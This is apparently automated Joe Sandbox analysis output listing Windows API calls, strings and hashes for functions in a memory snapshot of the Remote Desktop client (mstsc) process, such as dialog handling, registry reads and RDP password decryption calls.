                                                                                                                                                                                        • ShowWindow.USER32(00000000,00000004), ref: 0090A356
                                                                                                                                                                                        • SetFocus.USER32 ref: 0090A362
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: MessageSendWindow$CreateDestroyDialogFocusIndirectItemParamShow
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 820276176-0
                                                                                                                                                                                        • Opcode ID: 49becd9783ab11b2e1bc2dbe517ea75ae970b8291ef98a85723b29800f4d1403
                                                                                                                                                                                        • Instruction ID: ec8ae38b4bbe07326df31ed08dc7db5bc023eee60fd40be53e0c93d1f7d0f27c
                                                                                                                                                                                        • Opcode Fuzzy Hash: 49becd9783ab11b2e1bc2dbe517ea75ae970b8291ef98a85723b29800f4d1403
                                                                                                                                                                                        • Instruction Fuzzy Hash: 8D116972214B00AFDB721B70EC0DBA77BA5FB89B06F048818F25AA50B0C770A410EF45
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetDC.USER32(?), ref: 0090B8CD
                                                                                                                                                                                        • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0090B8DF
                                                                                                                                                                                        • RealizePalette.GDI32(00000000), ref: 0090B8E9
                                                                                                                                                                                        • UpdateColors.GDI32(00000000,?,00909186,?,?,?), ref: 0090B8F0
                                                                                                                                                                                        • UpdateWindow.USER32 ref: 0090B8F9
                                                                                                                                                                                        • SelectPalette.GDI32(00000000,?,00000000), ref: 0090B90A
                                                                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 0090B914
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Palette$SelectUpdate$ColorsRealizeReleaseWindow
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1473888637-0
                                                                                                                                                                                        • Opcode ID: a380d932656fb932bde64726405bef27e4d9194eaed041bc9bfd80170a32e930
                                                                                                                                                                                        • Instruction ID: 2bcc7cc9d63fa497da54bf3710c35d549586fd94d93712d6f2c71f81811a1c26
                                                                                                                                                                                        • Opcode Fuzzy Hash: a380d932656fb932bde64726405bef27e4d9194eaed041bc9bfd80170a32e930
                                                                                                                                                                                        • Instruction Fuzzy Hash: 8001ADB2529914BFC7115BA1DD0CB5ABBACFF05311F004124F515E1060CB31A920FFA0
                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 0091C46B: ??2@YAPAXI@Z.MSVCRT ref: 0091C474
                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,008E396B,00000000,00000000,?,?,008D1B90,?,00000400,?,?,?), ref: 008F32F6
                                                                                                                                                                                        • memset.MSVCRT ref: 008F331E
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008ED606: TraceMessage.ADVAPI32(00000000,00000000,0000002B,008D7B50,0000000A,008E396B,00000004,NULL,0000000A,00000000,?,00000000,00000000,0000000A,?,00913B87), ref: 008ED673
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Free$??2@AddressHandleLibraryLocalMessageModuleProcTracememset
                                                                                                                                                                                        • String ID: %s\%s$Addins$Default$Name
                                                                                                                                                                                        • API String ID: 1854944580-3070058336
                                                                                                                                                                                        • Opcode ID: 4299815463ac559db8241136e80a752439a2c5928868f36b4a2c7dc5b7a262e0
                                                                                                                                                                                        • Instruction ID: 378ee6f200c21ce3d64d275cbdc8c503864b367f45e86c4d138c1947254a1634
                                                                                                                                                                                        • Opcode Fuzzy Hash: 4299815463ac559db8241136e80a752439a2c5928868f36b4a2c7dc5b7a262e0
                                                                                                                                                                                        • Instruction Fuzzy Hash: 5CC1DD72600348AFDB29DF68CC45F7A77A6FB1A300F040099EA05DB2A1DA35DF849F46
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • memset.MSVCRT ref: 009233E0
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000800), ref: 00923424
                                                                                                                                                                                        • memset.MSVCRT ref: 0092347D
                                                                                                                                                                                          • Part of subcall function 00934E47: EventActivityIdControl.ADVAPI32(00000001,00000000,0093A020,00000000,00000000,00000000), ref: 00934E6E
                                                                                                                                                                                          • Part of subcall function 008E10B1: TraceMessage.ADVAPI32(00000000,008E396B,0000002B,008D7B50,0000000D,00913C39,00000004,00000000,?,00913C39,008E396B,00000000,00000000), ref: 008E10C8
                                                                                                                                                                                        • memset.MSVCRT ref: 00923492
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,-00000001), ref: 009235E1
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: memset$Local$ActivityAllocControlEventFreeMessageTrace
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 432507534-0
                                                                                                                                                                                        • Opcode ID: 0edc1961c4a2547278061480db08c82b0e1811394c6e94c65027d10ae975529b
                                                                                                                                                                                        • Instruction ID: 6741c90025ef8d431c6a0c51abe15fba1637dd7e62d1ba1cf28f142e531434f9
                                                                                                                                                                                        • Opcode Fuzzy Hash: 0edc1961c4a2547278061480db08c82b0e1811394c6e94c65027d10ae975529b
                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D6136715103249BDB3ADF14EC89F6A37ADEB49300F048099F94997266C639DF80EFA1
                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 00934E47: EventActivityIdControl.ADVAPI32(00000001,00000000,0093A020,00000000,00000000,00000000), ref: 00934E6E
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,00000000,00000000,?,00000000,?,?), ref: 0091FD7D
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0091FE27
                                                                                                                                                                                          • Part of subcall function 008E45D2: _vsnwprintf.MSVCRT ref: 008E4604
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Local$ActivityAllocControlEventFree_vsnwprintf
                                                                                                                                                                                        • String ID: %s\%s$Memory allocation failed$Servers$StringCchPrintf failed
                                                                                                                                                                                        • API String ID: 3268872356-1330720887
                                                                                                                                                                                        • Opcode ID: 105b5d9807561fd0165698a32ff168106654fa603bbc04cf0c2726088a4ad4b0
                                                                                                                                                                                        • Instruction ID: 520722e26d66572c741d070e80b416ba38265472783ff048409157a50b392d91
                                                                                                                                                                                        • Opcode Fuzzy Hash: 105b5d9807561fd0165698a32ff168106654fa603bbc04cf0c2726088a4ad4b0
                                                                                                                                                                                        • Instruction Fuzzy Hash: 53411432B0034CAFDB2A8E94D855F6A7BAAEB89314F150069E540DB2B3DB71CC819F51
                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 00913390: LocalFree.KERNEL32(?,?,008E3402,00000001,008D1B90,00000000,00000000,00000000,00000000,00000000,?,?,?,?), ref: 0091339C
                                                                                                                                                                                        • memset.MSVCRT ref: 008FE4EC
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 008FE52D
                                                                                                                                                                                          • Part of subcall function 0091BFCD: LoadLibraryW.KERNEL32(crypt32.dll,00000000,00000000,00000200,008FE57B), ref: 0091BFFE
                                                                                                                                                                                          • Part of subcall function 0091BFCD: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 0091C014
                                                                                                                                                                                          • Part of subcall function 0091BFCD: GetLastError.KERNEL32 ref: 0091C034
                                                                                                                                                                                          • Part of subcall function 0091BFCD: FreeLibrary.KERNEL32(00000000), ref: 0091C0B9
                                                                                                                                                                                        • memcpy.MSVCRT(?,00000000,?), ref: 008FE599
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 008FE5D0
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 008FE624
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: FreeLocal$Library$AddressAllocErrorLastLoadProcmemcpymemset
                                                                                                                                                                                        • String ID: Password 51
                                                                                                                                                                                        • API String ID: 2249177944-3933498968
                                                                                                                                                                                        • Opcode ID: bf70fc8911a4e9ae1f3c3afc123d3d4d1ae18c4e09e48e0c77f9b98d66154dd2
                                                                                                                                                                                        • Instruction ID: 5b9ce1b9a1d9eb301b351e5618b4bbddc395e907cd2d1e59e35bb93455f4ddfc
                                                                                                                                                                                        • Opcode Fuzzy Hash: bf70fc8911a4e9ae1f3c3afc123d3d4d1ae18c4e09e48e0c77f9b98d66154dd2
                                                                                                                                                                                        • Instruction Fuzzy Hash: 1141A070A0121D9BCB20AB64DC8DBEAB7B9FFA4304F1001A5E505E7261DB74DE81CF91
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • ??_U@YAPAXI@Z.MSVCRT(00000000,00000000,00000022,00003AB3), ref: 008E12EE
                                                                                                                                                                                        • ??_U@YAPAXI@Z.MSVCRT(00000000), ref: 008E1317
                                                                                                                                                                                        • memcpy_s.MSVCRT ref: 008E1334
                                                                                                                                                                                        • memcpy_s.MSVCRT ref: 008E1348
                                                                                                                                                                                        • ??_V@YAXPAX@Z.MSVCRT(00000000,Module), ref: 008E137B
                                                                                                                                                                                        • ??_V@YAXPAX@Z.MSVCRT(00000000), ref: 008E137E
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: memcpy_s
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1502251526-0
                                                                                                                                                                                        • Opcode ID: 4b720767a800f5fcba8700c5aa2259a5c7e45a6a2008598454249823238c3790
                                                                                                                                                                                        • Instruction ID: c42d9fe1dc69765a782df9c8fadfbf2c85b8238b573069219df3584faec1e45a
                                                                                                                                                                                        • Opcode Fuzzy Hash: 4b720767a800f5fcba8700c5aa2259a5c7e45a6a2008598454249823238c3790
                                                                                                                                                                                        • Instruction Fuzzy Hash: A331C876A001596BDF14DFADDC8AAFEB7ADFB45310F14812AFD05D7280DA349A018B90
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CheckRadioButton.USER32(?,000033B8,000033BA,000033B8), ref: 0090FA72
                                                                                                                                                                                        • CheckRadioButton.USER32(?,000033BD,000033BE,?), ref: 0090FA88
                                                                                                                                                                                        • GetDlgItem.USER32(?,000033BD), ref: 0090FA9E
                                                                                                                                                                                        • EnableWindow.USER32(00000000), ref: 0090FAA7
                                                                                                                                                                                        • GetDlgItem.USER32(?,000033BE), ref: 0090FAB3
                                                                                                                                                                                        • EnableWindow.USER32(00000000), ref: 0090FAB6
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E10B1: TraceMessage.ADVAPI32(00000000,008E396B,0000002B,008D7B50,0000000D,00913C39,00000004,00000000,?,00913C39,008E396B,00000000,00000000), ref: 008E10C8
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ButtonCheckEnableItemRadioWindow$AddressFreeHandleLibraryMessageModuleProcTrace
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3061383565-0
                                                                                                                                                                                        • Opcode ID: 02612a749ad2c644e244b6ea5a1e2b9c9ebd2e8611ca08b5a16dd4475f04a709
                                                                                                                                                                                        • Instruction ID: 6b198e9cd5b907161388804a604aa4079067fe3c3489158e002ab20183a49a5d
                                                                                                                                                                                        • Opcode Fuzzy Hash: 02612a749ad2c644e244b6ea5a1e2b9c9ebd2e8611ca08b5a16dd4475f04a709
                                                                                                                                                                                        • Instruction Fuzzy Hash: 13315532700708AFDB354B59CC98F16BB9EEB80B50F190071FA089B6E2DA35DF419B91
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CheckDlgButton.USER32(?,00003328,?), ref: 009068C8
                                                                                                                                                                                        • CheckDlgButton.USER32(?,00003330,?), ref: 009068DB
                                                                                                                                                                                        • CheckDlgButton.USER32(?,0000332F,?), ref: 009068EE
                                                                                                                                                                                        • CheckDlgButton.USER32(?,00003329,?), ref: 00906902
                                                                                                                                                                                        • CheckDlgButton.USER32(?,0000332A,?), ref: 00906917
                                                                                                                                                                                        • CheckDlgButton.USER32(?,0000332B,?), ref: 0090692A
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ButtonCheck
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 83588225-0
                                                                                                                                                                                        • Opcode ID: cae6bca611ae736fb55a23ec8a2d7118f55f31c94b19e9902b4b005616931ee6
                                                                                                                                                                                        • Instruction ID: dc395bfeb0604a476604d2e5848e8b8917d65ea89a48c1a0423996f91b637065
                                                                                                                                                                                        • Opcode Fuzzy Hash: cae6bca611ae736fb55a23ec8a2d7118f55f31c94b19e9902b4b005616931ee6
                                                                                                                                                                                        • Instruction Fuzzy Hash: E00188B27706147BEF054E09DCC2D673A5EEF883207154166F900DE2D5CEA9DE218A50
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • timeGetTime.WINMM ref: 0092199D
                                                                                                                                                                                        • timeKillEvent.WINMM(?), ref: 009219B0
                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,?), ref: 009219CD
                                                                                                                                                                                        • PostMessageW.USER32 ref: 009219DC
                                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0092198A,?), ref: 009219E3
                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,?), ref: 00921A15
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Windowtime$??3@EventKillMessagePostTime
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2170417897-0
                                                                                                                                                                                        • Opcode ID: 6c21335aaf27b5b7c5afb42c8ac66ac1403fbbf24aafd1c55c8a3f83cee5dbe0
                                                                                                                                                                                        • Instruction ID: b1223346e48b8c2cd9be4845dacf3baaa3d972e759846f89bff9a4fd961062e0
                                                                                                                                                                                        • Opcode Fuzzy Hash: 6c21335aaf27b5b7c5afb42c8ac66ac1403fbbf24aafd1c55c8a3f83cee5dbe0
                                                                                                                                                                                        • Instruction Fuzzy Hash: 77112E76114A04FFDB219FA4DC09E5ABBFAFB0C710F104A48F686A2564C772B860EF54
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetDC.USER32(?), ref: 0090B940
                                                                                                                                                                                        • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0090B952
                                                                                                                                                                                        • RealizePalette.GDI32(00000000), ref: 0090B95C
                                                                                                                                                                                        • UpdateColors.GDI32(00000000,?,?,?,008EFF75,?), ref: 0090B963
                                                                                                                                                                                        • SelectPalette.GDI32(00000000,?,00000000), ref: 0090B974
                                                                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 0090B97E
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Palette$Select$ColorsRealizeReleaseUpdate
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1468195242-0
                                                                                                                                                                                        • Opcode ID: 482100e2c85d256877dfc6b665028fead2b8b044cd194b8de9e29ff4a9be87bb
                                                                                                                                                                                        • Instruction ID: 970292a7c367131b8889258931ac35271d86e8484a0ae2605b61d1eb17e06361
                                                                                                                                                                                        • Opcode Fuzzy Hash: 482100e2c85d256877dfc6b665028fead2b8b044cd194b8de9e29ff4a9be87bb
                                                                                                                                                                                        • Instruction Fuzzy Hash: 78F087B2129A15BFC7215BA5DC08F9ABBACBF05359F048120F614E2250CB30E800EFE0
                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 008F0AC3: GetClientRect.USER32(?,00000006,?,?,00000000,00000006,00000000,?), ref: 008F0AE1
                                                                                                                                                                                          • Part of subcall function 008F0AC3: RedrawWindow.USER32(?,00000006,00000000,00000045), ref: 008F0AF9
                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000400,00000000,?,?,?,008EE364,00000000,00000006,00000000,?), ref: 008F0483
                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000400,00000000,?,?,?,008EE364,00000000,00000006,00000000,?), ref: 008F05E9
                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000400,?,00000400,00000000,?,?,?,008EE364,00000000,00000006,00000000,?), ref: 008F064E
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008ED87E: TraceMessage.ADVAPI32(?,00000000,0000002B,008D8AB4,00000028,00000000,00000004,NULL,0000000A,0091BF7D,00000004,00000000,00000000,00000000,80070000,00000028), ref: 008ED8F1
                                                                                                                                                                                          • Part of subcall function 008F1012: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 008F1050
                                                                                                                                                                                          • Part of subcall function 008F1012: memset.MSVCRT ref: 008F107C
                                                                                                                                                                                          • Part of subcall function 008F1012: SendMessageW.USER32(?,0000104B,00000000,?), ref: 008F10C3
                                                                                                                                                                                          • Part of subcall function 008F1012: lstrcmpiW.KERNEL32(?,?,?,?,?), ref: 008F10D5
                                                                                                                                                                                          • Part of subcall function 008E45D2: _vsnwprintf.MSVCRT ref: 008E4604
                                                                                                                                                                                        • ShellMessageBoxW.SHLWAPI ref: 008F06BB
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Message$ErrorLast$Send$AddressClientFreeHandleLibraryModuleProcRectRedrawShellTraceWindow_vsnwprintflstrcmpimemset
                                                                                                                                                                                        • String ID: StringCchPrintf failed
                                                                                                                                                                                        • API String ID: 2650913945-1082955989
                                                                                                                                                                                        • Opcode ID: 196c487ff6f2825e0cb62d739eb3f3b71741a184687387a9992ee44f72acc7fd
                                                                                                                                                                                        • Instruction ID: 19a90effe0cfa169a5a8915f21e403338d63ed6986da44b74abba936e5398b38
                                                                                                                                                                                        • Opcode Fuzzy Hash: 196c487ff6f2825e0cb62d739eb3f3b71741a184687387a9992ee44f72acc7fd
                                                                                                                                                                                        • Instruction Fuzzy Hash: E091DE712043486FDB29DF24CC85F7A73AAFBA9308F148419E745DA2A3CA75D8518F27
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • wcsstr.MSVCRT ref: 008FF42E
                                                                                                                                                                                        • wcschr.MSVCRT ref: 008FF443
                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000000,000036C5), ref: 008FF4A4
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • Attempted override of sensitive settings for signed file, xrefs: 008FF4D1
                                                                                                                                                                                        • cookie=, xrefs: 008FF428
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: HandleModulewcschrwcsstr
                                                                                                                                                                                        • String ID: Attempted override of sensitive settings for signed file$cookie=
                                                                                                                                                                                        • API String ID: 2156438982-3397407268
                                                                                                                                                                                        • Opcode ID: d10369ad0e65461da9120cbc6590b34d96844ae16a40cfa7e46ebcc4e39e40f8
                                                                                                                                                                                        • Instruction ID: 396825b4e94b7b95407138d144a3cbd5f44efac134c3cb858d3337111044d0f1
                                                                                                                                                                                        • Opcode Fuzzy Hash: d10369ad0e65461da9120cbc6590b34d96844ae16a40cfa7e46ebcc4e39e40f8
                                                                                                                                                                                        • Instruction Fuzzy Hash: 97817E74500B488ADB29DF39C8846B677E5FF94300F18857EEB4ACA25AD730A981CB65
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 008EF3B4
                                                                                                                                                                                        • memset.MSVCRT ref: 008EF3DB
                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000100), ref: 008EF3FE
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E2C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,008D7B50,0000000B,008E396B,00000004,00913BC2,00000004,00000000,?,00913BC2,008E396B,00000000,00000000,00000000), ref: 008E2C85
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Message$AddressErrorFreeHandleLastLibraryModuleProcSendTracememset
                                                                                                                                                                                        • String ID: AddRemoteApplicationToQueueUi failed!$SetAppIDAndDisablePinning failed!
                                                                                                                                                                                        • API String ID: 2233238036-2972087449
                                                                                                                                                                                        • Opcode ID: 27f31d8fdb4f04a60733d546a0354331afad82935ac9dfb56da31996a1e196ef
                                                                                                                                                                                        • Instruction ID: 629b224e8de53fff6ddddab146d11be9371ffd519ef595c066f9ac5e14101a5f
                                                                                                                                                                                        • Opcode Fuzzy Hash: 27f31d8fdb4f04a60733d546a0354331afad82935ac9dfb56da31996a1e196ef
                                                                                                                                                                                        • Instruction Fuzzy Hash: E961C471204385AFDB19DF66D949F6637AAFB56308F140069F641CB1A3CA31ED42CF52
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32 ref: 0091DB88
                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0091DBFA
                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0091DCB0
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 0091D76F: TraceMessage.ADVAPI32(?,?,0000002B,008D8C04,?,00000000,00000004,NULL,0000000A,NULL,0000000A,0091DC4D,00000004,00000000,?,00000000), ref: 0091D835
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressCloseFreeHandleLibraryMessageModuleOpenProcQueryTraceValue
